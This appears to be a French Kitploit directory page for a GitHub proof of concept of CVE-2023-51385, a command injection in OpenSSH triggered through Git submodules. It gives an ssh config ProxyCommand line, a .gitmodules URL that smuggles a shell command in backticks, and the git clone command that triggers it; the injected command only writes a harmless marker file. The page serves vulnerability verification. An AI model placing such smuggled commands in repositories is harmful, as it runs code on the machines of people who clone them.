Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-51385_test — 一个验证对CVE-2023-51385 | Kitploit
Outils/GitHubGitHub/ltmthink/cve-2023-51385_test
Vulnerability AnalysisExploitationWeb Application ExploitationSupply Chain SecurityLearning & Education
GitHubltmthink/cve-2023-51385_test

CVE-2023-51385_test

一个验证对CVE-2023-51385

Voir le dépôt
717il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Vérifier CVE-2023-51385

Il faut d'abord ajouter le contenu suivant dans ~/.ssh/config

root@kitploit:~
host *.example.com
  ProxyCommand /usr/bin/nc -X connect -x 192.0.2.0:8080 %h %p

Il y a une injection de commande dans l'instruction du fichier .gitmodules

root@kitploit:~
url = ssh://`echo helloworld > cve.txt`foo.example.com/bar

Une fois la configuration terminée, exécutez la commande ci-dessous pour déclencher l'exploitation

root@kitploit:~
git clone https://github.com/LtmThink/CVE-2023-51385_test --recurse-submodules

En cas de succès, un fichier cve.txt sera généré dans le répertoire CVE-2023-51385_test

image-20240317161540677

Note : OpenSSH doit être < 9.6p1

Pour plus de détails, voir cet article :

https://vin01.github.io/piptagole/ssh/security/openssh/libssh/remote-code-execution/2023/12/20/openssh-proxycommand-libssh-rce.html

Télécharger l’outil